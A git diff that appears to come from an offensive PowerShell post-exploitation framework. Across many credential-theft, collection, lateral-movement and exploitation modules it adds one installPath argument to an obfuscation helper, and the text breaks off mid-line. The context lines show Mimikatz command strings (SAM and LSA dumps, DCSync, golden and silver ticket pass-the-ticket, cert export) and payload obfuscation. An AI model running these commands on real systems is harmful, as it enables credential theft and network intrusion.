b/lib/modules/powershell/collection/minidump.py index 0b74e07..ea99308 100644 --- a/lib/modules/powershell/collection/minidump.py +++ b/lib/modules/powershell/collection/minidump.py @@ -98,6 +98,6 @@ class Module: if option != "Agent" and option != "ProcessName" and option != "ProcessId": scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/netripper.py b/lib/modules/powershell/collection/netripper.py index 0be077d..304b1fa 100644 --- a/lib/modules/powershell/collection/netripper.py +++ b/lib/modules/powershell/collection/netripper.py @@ -117,6 +117,6 @@ class Module: scriptEnd += ";'Invoke-NetRipper completed.'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/ninjacopy.py b/lib/modules/powershell/collection/ninjacopy.py index 8f9aa35..a056072 100644 --- a/lib/modules/powershell/collection/ninjacopy.py +++ b/lib/modules/powershell/collection/ninjacopy.py @@ -103,6 +103,6 @@ class Module: scriptEnd += "; Write-Output 'Invoke-NinjaCopy Completed'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/packet_capture.py b/lib/modules/powershell/collection/packet_capture.py index ae26455..8c367c0 100644 --- a/lib/modules/powershell/collection/packet_capture.py +++ b/lib/modules/powershell/collection/packet_capture.py @@ -90,5 +90,5 @@ class Module: if persistent != "": script += " persistent=yes" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/prompt.py b/lib/modules/powershell/collection/prompt.py index b0b00da..4339abd 100644 --- a/lib/modules/powershell/collection/prompt.py +++ b/lib/modules/powershell/collection/prompt.py @@ -120,5 +120,5 @@ Invoke-Prompt """ else: script += " -" + str(option) + " \"" + str(values['Value'].strip("\"")) + "\"" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/screenshot.py b/lib/modules/powershell/collection/screenshot.py index 091a2d2..b5a4fc2 100644 --- a/lib/modules/powershell/collection/screenshot.py +++ b/lib/modules/powershell/collection/screenshot.py @@ -115,5 +115,5 @@ Get-Screenshot""" else: script += " -" + str(option) + " " + str(values['Value']) if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py index a348ea6..282050f 100644 --- a/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py +++ b/lib/modules/powershell/collection/vaults/add_keepass_config_trigger.py @@ -118,6 +118,6 @@ class Module: scriptEnd += "\nFind-KeePassconfig | Get-KeePassConfigTrigger " scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/find_keepass_config.py b/lib/modules/powershell/collection/vaults/find_keepass_config.py index b4ef71a..5e63397 100644 --- a/lib/modules/powershell/collection/vaults/find_keepass_config.py +++ b/lib/modules/powershell/collection/vaults/find_keepass_config.py @@ -90,6 +90,6 @@ class Module: scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py index b0a0935..a937b0b 100644 --- a/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py +++ b/lib/modules/powershell/collection/vaults/get_keepass_config_trigger.py @@ -90,6 +90,6 @@ class Module: scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/keethief.py b/lib/modules/powershell/collection/vaults/keethief.py index 836c398..9122971 100644 --- a/lib/modules/powershell/collection/vaults/keethief.py +++ b/lib/modules/powershell/collection/vaults/keethief.py @@ -90,6 +90,6 @@ class Module: scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py b/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py index 7cce50d..5de6543 100644 --- a/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py +++ b/lib/modules/powershell/collection/vaults/remove_keepass_config_trigger.py @@ -92,6 +92,6 @@ class Module: scriptEnd += "\nFind-KeePassconfig | Remove-KeePassConfigTrigger " scriptEnd += ' | Format-List | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/credential_injection.py b/lib/modules/powershell/credentials/credential_injection.py index 30b3638..bf541e4 100644 --- a/lib/modules/powershell/credentials/credential_injection.py +++ b/lib/modules/powershell/credentials/credential_injection.py @@ -151,6 +151,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/enum_cred_store.py b/lib/modules/powershell/credentials/enum_cred_store.py index c04fa82..7e5afc8 100644 --- a/lib/modules/powershell/credentials/enum_cred_store.py +++ b/lib/modules/powershell/credentials/enum_cred_store.py @@ -54,6 +54,6 @@ class Module: scriptEnd = "\n%s" %(scriptCmd) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/invoke_kerberoast.py b/lib/modules/powershell/credentials/invoke_kerberoast.py index ec8e320..a94ef2a 100644 --- a/lib/modules/powershell/credentials/invoke_kerberoast.py +++ b/lib/modules/powershell/credentials/invoke_kerberoast.py @@ -124,6 +124,6 @@ class Module: scriptEnd += '| fl | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/cache.py b/lib/modules/powershell/credentials/mimikatz/cache.py index 64f2a8d..90b0986 100644 --- a/lib/modules/powershell/credentials/mimikatz/cache.py +++ b/lib/modules/powershell/credentials/mimikatz/cache.py @@ -76,6 +76,6 @@ class Module: scriptEnd += "'\"token::elevate\" \"lsadump::cache\" \"token::revert\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/certs.py b/lib/modules/powershell/credentials/mimikatz/certs.py index bc6cfa7..9bb7f87 100644 --- a/lib/modules/powershell/credentials/mimikatz/certs.py +++ b/lib/modules/powershell/credentials/mimikatz/certs.py @@ -73,6 +73,6 @@ class Module: # add in the cert dumping command scriptEnd = """Invoke-Mimikatz -Command 'crypto::capi privilege::debug crypto::cng "crypto::certificates /systemstore:local_machine /store:root /export"' """ if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/command.py b/lib/modules/powershell/credentials/mimikatz/command.py index 6fe1eaa..c5d8ab1 100644 --- a/lib/modules/powershell/credentials/mimikatz/command.py +++ b/lib/modules/powershell/credentials/mimikatz/command.py @@ -79,6 +79,6 @@ class Module: scriptEnd = "Invoke-Mimikatz -Command " scriptEnd += "'\"" + self.options['Command']['Value'] + "\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/dcsync.py b/lib/modules/powershell/credentials/mimikatz/dcsync.py index c5c9305..4f725b9 100644 --- a/lib/modules/powershell/credentials/mimikatz/dcsync.py +++ b/lib/modules/powershell/credentials/mimikatz/dcsync.py @@ -100,6 +100,6 @@ class Module: scriptEnd += "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py b/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py index e622667..cd46e70 100644 --- a/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py +++ b/lib/modules/powershell/credentials/mimikatz/dcsync_hashdump.py @@ -109,6 +109,6 @@ class Module: scriptEnd += "| Out-String;" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/extract_tickets.py b/lib/modules/powershell/credentials/mimikatz/extract_tickets.py index eec8576..33d9ea7 100644 --- a/lib/modules/powershell/credentials/mimikatz/extract_tickets.py +++ b/lib/modules/powershell/credentials/mimikatz/extract_tickets.py @@ -72,6 +72,6 @@ class Module: scriptEnd = "Invoke-Mimikatz -Command '\"standard::base64\" \"kerberos::list /export\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/golden_ticket.py b/lib/modules/powershell/credentials/mimikatz/golden_ticket.py index 4370568..3a9da38 100644 --- a/lib/modules/powershell/credentials/mimikatz/golden_ticket.py +++ b/lib/modules/powershell/credentials/mimikatz/golden_ticket.py @@ -150,6 +150,6 @@ class Module: scriptEnd += " /ptt\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/logonpasswords.py b/lib/modules/powershell/credentials/mimikatz/logonpasswords.py index 9bcc167..b8f0d6e 100644 --- a/lib/modules/powershell/credentials/mimikatz/logonpasswords.py +++ b/lib/modules/powershell/credentials/mimikatz/logonpasswords.py @@ -78,6 +78,6 @@ class Module: if values['Value'] and values['Value'] != '': scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/lsadump.py b/lib/modules/powershell/credentials/mimikatz/lsadump.py index 94692fb..6fab658 100644 --- a/lib/modules/powershell/credentials/mimikatz/lsadump.py +++ b/lib/modules/powershell/credentials/mimikatz/lsadump.py @@ -86,6 +86,6 @@ class Module: scriptEnd += "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/mimitokens.py b/lib/modules/powershell/credentials/mimikatz/mimitokens.py index 23020b4..afa5f63 100644 --- a/lib/modules/powershell/credentials/mimikatz/mimitokens.py +++ b/lib/modules/powershell/credentials/mimikatz/mimitokens.py @@ -137,6 +137,6 @@ class Module: scriptEnd += "\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/pth.py b/lib/modules/powershell/credentials/mimikatz/pth.py index 423969f..6da1a65 100644 --- a/lib/modules/powershell/credentials/mimikatz/pth.py +++ b/lib/modules/powershell/credentials/mimikatz/pth.py @@ -126,6 +126,6 @@ class Module: scriptEnd += ';"`nUse credentials/token to steal the token of the created PID."' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/purge.py b/lib/modules/powershell/credentials/mimikatz/purge.py index edac4ea..834d804 100644 --- a/lib/modules/powershell/credentials/mimikatz/purge.py +++ b/lib/modules/powershell/credentials/mimikatz/purge.py @@ -74,6 +74,6 @@ class Module: # set the purge command scriptEnd = "Invoke-Mimikatz -Command '\"kerberos::purge\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/sam.py b/lib/modules/powershell/credentials/mimikatz/sam.py index 2d229fb..4672a4c 100644 --- a/lib/modules/powershell/credentials/mimikatz/sam.py +++ b/lib/modules/powershell/credentials/mimikatz/sam.py @@ -76,6 +76,6 @@ class Module: scriptEnd += "'\"token::elevate\" \"lsadump::sam\" \"token::revert\"';" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/silver_ticket.py b/lib/modules/powershell/credentials/mimikatz/silver_ticket.py index 47187f9..0deb85c 100644 --- a/lib/modules/powershell/credentials/mimikatz/silver_ticket.py +++ b/lib/modules/powershell/credentials/mimikatz/silver_ticket.py @@ -162,6 +162,6 @@ class Module: scriptEnd += " /ptt\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/mimikatz/trust_keys.py b/lib/modules/powershell/credentials/mimikatz/trust_keys.py index c216a2a..720cf4e 100644 --- a/lib/modules/powershell/credentials/mimikatz/trust_keys.py +++ b/lib/modules/powershell/credentials/mimikatz/trust_keys.py @@ -80,6 +80,6 @@ class Module: else: scriptEnd += "Invoke-Mimikatz -Command '\"lsadump::trust /patch\"'" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/powerdump.py b/lib/modules/powershell/credentials/powerdump.py index 2abe750..caba57a 100644 --- a/lib/modules/powershell/credentials/powerdump.py +++ b/lib/modules/powershell/credentials/powerdump.py @@ -70,6 +70,6 @@ class Module: scriptEnd = "Invoke-PowerDump" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/sessiongopher.py b/lib/modules/powershell/credentials/sessiongopher.py index c7acc1b..ee707d1 100644 --- a/lib/modules/powershell/credentials/sessiongopher.py +++ b/lib/modules/powershell/credentials/sessiongopher.py @@ -136,6 +136,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/tokens.py b/lib/modules/powershell/credentials/tokens.py index f79785f..06761f3 100644 --- a/lib/modules/powershell/credentials/tokens.py +++ b/lib/modules/powershell/credentials/tokens.py @@ -155,6 +155,6 @@ class Module: if self.options['RevToSelf']['Value'].lower() != "true": scriptEnd += ';"`nUse credentials/tokens with RevToSelf option to revert token privileges"' if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/credentials/vault_credential.py b/lib/modules/powershell/credentials/vault_credential.py index ab983b6..07623da 100644 --- a/lib/modules/powershell/credentials/vault_credential.py +++ b/lib/modules/powershell/credentials/vault_credential.py @@ -73,6 +73,6 @@ class Module: scriptEnd = "Get-VaultCredential" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/exfiltration/egresscheck.py b/lib/modules/powershell/exfiltration/egresscheck.py index 02d56e5..902c19d 100644 --- a/lib/modules/powershell/exfiltration/egresscheck.py +++ b/lib/modules/powershell/exfiltration/egresscheck.py @@ -119,6 +119,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/exploitation/exploit_jboss.py b/lib/modules/powershell/exploitation/exploit_jboss.py index 3cf9645..5fe2b02 100644 --- a/lib/modules/powershell/exploitation/exploit_jboss.py +++ b/lib/modules/powershell/exploitation/exploit_jboss.py @@ -110,6 +110,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/exploitation/exploit_jenkins.py b/lib/modules/powershell/exploitation/exploit_jenkins.py index d811188..9d97fd5 100644 --- a/lib/modules/powershell/exploitation/exploit_jenkins.py +++ b/lib/modules/powershell/exploitation/exploit_jenkins.py @@ -95,6 +95,6 @@ class Module: scriptEnd += " -Cmd " + command if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/inveigh_relay.py b/lib/modules/powershell/lateral_movement/inveigh_relay.py index 396aa44..93c4982 100644 --- a/lib/modules/powershell/lateral_movement/inveigh_relay.py +++ b/lib/modules/powershell/lateral_movement/inveigh_relay.py @@ -193,6 +193,6 @@ class Module: else: scriptEnd += " -" + str(option) + " \"" + str(values['Value']) + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_dcom.py b/lib/modules/powershell/lateral_movement/invoke_dcom.py index ba766c3..76b28d7 100644 --- a/lib/modules/powershell/lateral_movement/invoke_dcom.py +++ b/lib/modules/powershell/lateral_movement/invoke_dcom.py @@ -131,6 +131,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py b/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py index cdafed5..519124d 100644 --- a/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py +++ b/lib/modules/powershell/lateral_movement/invoke_executemsbuild.py @@ -185,6 +185,6 @@ class Module: scriptEnd += " | Out-String" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_psexec.py b/lib/modules/powershell/lateral_movement/invoke_psexec.py index ca5fb57..c8f81c1 100644 --- a/lib/modules/powershell/lateral_movement/invoke_psexec.py +++ b/lib/modules/powershell/lateral_movement/invoke_psexec.py @@ -146,6 +146,6 @@ class Module: scriptEnd += "| Out-String | %{$_ + \"`n\"};" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_psremoting.py b/lib/modules/powershell/lateral_movement/invoke_psremoting.py index e238d20..2f7879b 100644 --- a/lib/modules/powershell/lateral_movement/invoke_psremoting.py +++ b/lib/modules/powershell/lateral_movement/invoke_psremoting.py @@ -136,5 +136,5 @@ class Module: script += ";'Invoke-PSRemoting executed on " +computerNames +"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py index 316cae5..2bfdbd2 100644 --- a/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py +++ b/lib/modules/powershell/lateral_movement/invoke_sqloscmd.py @@ -132,6 +132,6 @@ class Module: if password != "": scriptEnd += " -Password "+password if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_sshcommand.py b/lib/modules/powershell/lateral_movement/invoke_sshcommand.py index 7cef7e8..0464e0b 100644 --- a/lib/modules/powershell/lateral_movement/invoke_sshcommand.py +++ b/lib/modules/powershell/lateral_movement/invoke_sshcommand.py @@ -123,6 +123,6 @@ class Module: else: scriptEnd += " -" + str(option) + " " + str(values['Value']) if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/invoke_wmi.py b/lib/modules/powershell/lateral_movement/invoke_wmi.py index 23e5fb5..db318bc 100644 --- a/lib/modules/powershell/lateral_movement/invoke_wmi.py +++ b/lib/modules/powershell/lateral_movement/invoke_wmi.py @@ -145,5 +145,5 @@ class Module: script += ";'Invoke-Wmi executed on " +computerNames +"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py b/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py index afbd7b0..f7508a3 100644 --- a/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py +++ b/lib/modules/powershell/lateral_movement/invoke_wmi_debugger.py @@ -187,6 +187,6 @@ class Module: script += ";'Invoke-Wmi executed on " +computerNames + statusMsg+"'" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/lateral_movement/jenkins_script_console.py b/lib/modules/powershell/lateral_movement/jenkins_script_console.py index 16b49e4..cb70a24 100644 --- a/lib/modules/powershell/lateral_movement/jenkins_script_console.py +++ b/lib/modules/powershell/lateral_movement/jenkins_script_console.py @@ -121,6 +121,6 @@ class Module: scriptEnd += " -Port "+str(self.options['Port']['Value']) scriptEnd += " -Cmd \"" + launcher + "\"" if obfuscate: - scriptEnd = helpers.obfuscate(psScript=scriptEnd, obfuscationCommand=obfuscationCommand) + scriptEnd = helpers.obfuscate(self.mainMenu.installPath, psScript=scriptEnd, obfuscationCommand=obfuscationCommand) script += scriptEnd return script diff --git a/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py b/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py index cd01e68..3202f92 100644 --- a/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py +++ b/lib/modules/powershell/lateral_movement/new_gpo_immediate_task.py @@ -162,5 +162,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/disable_rdp.py b/lib/modules/powershell/management/disable_rdp.py index 3cb332a..dd368c7 100644 --- a/lib/modules/powershell/management/disable_rdp.py +++ b/lib/modules/powershell/management/disable_rdp.py @@ -55,5 +55,5 @@ class Module: # command to enable NLA only if the enable runs successfully script += " if ($?) { $null = reg add \"HKLM\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v UserAuthentication /t REG_DWORD /d 1 /f }" if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand) return script diff --git a/lib/modules/powershell/management/downgrade_account.py b/lib/modules/powershell/management/downgrade_account.py index a711b0f..3d385df 100644 --- a/lib/modules/powershell/management/downgrade_account.py +++ b/lib/modules/powershell/management/downgrade_account.py @@ -100,5 +100,5 @@ class Module: script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"' if obfuscate: - script = helpers.obfuscate(psScript=script, obfuscationCommand=obfuscationCommand) + script = 